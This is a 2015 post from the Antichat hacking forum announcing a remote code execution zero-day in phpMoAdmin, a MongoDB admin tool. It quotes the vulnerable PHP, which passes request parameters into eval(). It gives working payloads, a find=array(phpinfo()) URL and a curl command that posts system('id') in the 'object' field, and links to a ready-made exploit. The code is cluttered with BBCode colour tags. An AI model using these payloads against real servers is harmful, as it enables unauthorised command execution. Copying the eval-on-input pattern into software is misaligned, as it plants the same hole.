Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   MongoDB phpMoAdmin Zero-day (https://forum.antichat.xyz/showthread.php?t=422877)

VY_CMa 04.03.2015 15:50
RCE. Новость тут .

Видео https://vimeo.com/121072742

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$find[/COLOR][COLOR="#007700"]= array();

 if (isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'find'[/COLOR][COLOR="#007700"]]) &&[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'find'[/COLOR][COLOR="#007700"]]) {

[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'find'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]trim[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'find'[/COLOR][COLOR="#007700"]]);

 if ([/COLOR][COLOR="#0000BB"]strpos[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'find'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]'array'[/COLOR][COLOR="#007700"]) ===[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]) {

 eval([/COLOR][COLOR="#DD0000"]'$find = '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'find'[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]';'[/COLOR][COLOR="#007700"]);

 } else if ([/COLOR][COLOR="#0000BB"]is_string[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'find'[/COLOR][COLOR="#007700"]])) {

 if ([/COLOR][COLOR="#0000BB"]$findArr[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]json_decode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'find'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"])) {

[/COLOR][COLOR="#0000BB"]$find[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$findArr[/COLOR][COLOR="#007700"];

 }

 }

 }[/COLOR][/COLOR
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//localhost/moadmin.php?action=listRows&find=array(phpinfo())&collection=123[/COLOR][/COLOR] 
UP: на секлисте запостили другой способ

Код:
Code:
curl "http://path.to/moadmin.php"; -d "object=1;system('id');exit"
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]Filename[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]moadmin[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php

1. create[/COLOR][COLOR="#007700"]new[/COLOR][COLOR="#0000BB"]moadminComponent object

1977[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]$mo[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]moadminComponent[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]2.[/COLOR][COLOR="#007700"]if[/COLOR][COLOR="#0000BB"]the http[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]post parameter[/COLOR][COLOR="#DD0000"]'object'[/COLOR][COLOR="#0000BB"]is set

738[/COLOR][COLOR="#007700"]: class[/COLOR][COLOR="#0000BB"]moadminComponent[/COLOR][COLOR="#007700"]{

...

[/COLOR][COLOR="#0000BB"]762[/COLOR][COLOR="#007700"]: public function[/COLOR][COLOR="#0000BB"]__construct[/COLOR][COLOR="#007700"]() {

...

[/COLOR][COLOR="#0000BB"]786[/COLOR][COLOR="#007700"]: if (isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'object'[/COLOR][COLOR="#007700"]])) {

[/COLOR][COLOR="#0000BB"]787[/COLOR][COLOR="#007700"]: if ([/COLOR][COLOR="#0000BB"]self[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]$model[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]saveObject[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'collection'[/COLOR][COLOR="#007700"]],

[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'object'[/COLOR][COLOR="#007700"]])) {

...

[/COLOR][COLOR="#0000BB"]3. evaluate the value of[/COLOR][COLOR="#DD0000"]'object'[/COLOR][COLOR="#007700"]as[/COLOR][COLOR="#0000BB"]PHP code

692[/COLOR][COLOR="#007700"]: public function[/COLOR][COLOR="#0000BB"]saveObject[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$collection[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$obj[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]693[/COLOR][COLOR="#007700"]: eval([/COLOR][COLOR="#DD0000"]'$obj='[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$obj[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]';'[/COLOR][COLOR="#007700"]);[/COLOR][COLOR="#FF8000"]//cast from string to array

[/COLOR][/COLOR
Готовый сплой: https://github.com/XiphosResearch/exploits/tree/master/phpMoAdmin


Время: 00:20